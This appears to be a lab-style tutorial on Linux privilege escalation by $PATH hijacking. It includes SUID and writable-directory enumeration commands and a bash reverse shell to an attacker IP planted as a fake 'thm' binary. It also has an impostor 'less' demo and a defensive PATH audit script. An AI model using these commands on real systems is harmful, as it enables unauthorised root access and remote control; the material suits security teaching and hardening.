$PATH Hijacking - Linux Privilege Escalation

What is a PATH?

$PATH in Linux is an environment variable that tells the operating system which directories to search for binaries and other executables. To print your PATH, run `echo $PATH`. When you type a command, the shell walks the listed directories from left to right looking for an executable with that name; as soon as it finds one, it stops searching and runs it. So what is PATH hijacking?

$PATH Hijacking

Essentially, it means finding a command that runs with root privileges, either because it has the SUID bit set or because it is a file executed by root, then creating a duplicate of that command in a writable directory, putting malicious code (such as spawning a reverse shell) inside it, and placing that directory first in the PATH so the duplicate is executed instead of the original. Think of it as an evil twin trying to ruin your life.

Additional resource I think would help: https://www.youtube.com/watch?v=-4asq6Tldf0&t=750s&ab_channel=IppSec

First, let's find out whether any binary has the SUID bit set. The following command prints the files that have SUID set, along with each file's owner and location: `find / -type f -perm -04000 -ls 2>/dev/null | awk '{print $3, $5, $6, $NF}'`


The next step is finding directories that are writable. This command helps narrow the search: `find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u`

What stands out is that /home/murdoch hosts a file with SUID set and is also a writable location. That makes it a perfect place to stage the attack. Next, I change my current directory to /home/murdoch. Running ls -l shows that the permissions on murdoch allow anyone to read, write and execute.

Now it's time to go into the directory. It contains two items: test and thm.py. Here is the content of thm.py:

It looks like test was created from thm.py. I say that because running ./test prints that thm was not found. So the next step is creating an executable called thm with malicious code in it. First I create thm with `touch thm`, then I add the following lines to it:
```bash
#!/bin/bash

/bin/bash -i >& /dev/tcp/10.10.53.99/6777 0>&1
```

Note: Replace 10.10.53.99 and 6777 with your attacker IP and port.

Then I run `chmod u+x thm` and add the current directory to the $PATH with `export PATH=/home/murdoch:$PATH`, followed by `echo $PATH` to see the updated path.


Now, let's set up our listener and execute ./test. Boom! We have root privileges.

Masquerading as a Legit command

Here we have the command less. Running `which less` prints the location of the binary that is executed, which is /usr/bin/less. But suppose less could be run as root with sudo, or even had the SUID bit set; we could abuse that opportunity to get root privileges.

To do that we first need a writable location that anyone can write to. For the sake of the example, I will use /home/murdoch. Then I create a file named less, give it read, write and execute permissions for everyone (777), and put the following code inside it:

```bash
#!/bin/bash
echo "Hello, you been infected"
```

Since /home/murdoch is already in our PATH, whenever we type less the shell prints "Hello, you been infected". Additionally, `which less` now shows that the path has changed from /usr/bin/less to /home/murdoch/less.
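As an added example (not code from the original post), here is a small shell audit of the two facts this post relies on: the shell resolves a command to the first match while walking PATH left to right, and a writable directory placed ahead of /usr/bin makes `which less` point somewhere else. The directory names and the two stand-in `less` scripts are constructed in a temporary directory.

```shell
#!/bin/sh
# Added example, not from the original post: a small PATH audit for defenders.
# It flags PATH entries an unprivileged user could plant a look-alike binary in
# (writable, relative or empty entries) and resolves a command name the way the
# shell does, first match from left to right. demo() works only in a temp dir.

# Walk a colon-separated PATH string and flag risky entries.
audit_path() {
    rest="${1:-$PATH}:"
    while [ -n "$rest" ]; do
        entry="${rest%%:*}"          # the entry before the next colon
        rest="${rest#*:}"            # drop it from the remainder
        case "$entry" in
            "" | .) echo "RELATIVE  '${entry:-.}' (resolves to the current directory)" ;;
            /*)
                if [ ! -d "$entry" ]; then echo "MISSING   $entry"
                elif [ -w "$entry" ]; then echo "WRITABLE  $entry"
                fi ;;
            *) echo "RELATIVE  $entry" ;;
        esac
    done
}

# Print the file a command name would run under the given PATH, like `which`.
resolve_cmd() {
    name="$1"; rest="${2:-$PATH}:"
    while [ -n "$rest" ]; do
        entry="${rest%%:*}"; rest="${rest#*:}"
        if [ -f "${entry:-.}/$name" ] && [ -x "${entry:-.}/$name" ]; then
            printf '%s\n' "${entry:-.}/$name"
            return 0
        fi
    done
    return 1                          # not found in any PATH entry
}

# Constructed demo: a user-writable directory placed in front of the real bin
# directory changes what `less` resolves to, which is the hijack described above.
demo() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/bin" "$tmp/staging"
    printf '#!/bin/sh\necho real less\n' > "$tmp/bin/less"
    printf '#!/bin/sh\necho planted less\n' > "$tmp/staging/less"
    chmod 755 "$tmp/bin/less" "$tmp/staging/less"
    echo "safe order   : $(resolve_cmd less "$tmp/bin:$tmp/staging")"
    echo "hijack order : $(resolve_cmd less "$tmp/staging:$tmp/bin")"
    audit_path "$tmp/staging:$tmp/bin:."
    rm -rf "$tmp"
}
demo
```

Running `audit_path` with no argument checks the current shell's own $PATH, which is the check worth adding to a hardening baseline.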


That is all I have to share on PATH hijacking. Thanks for reading.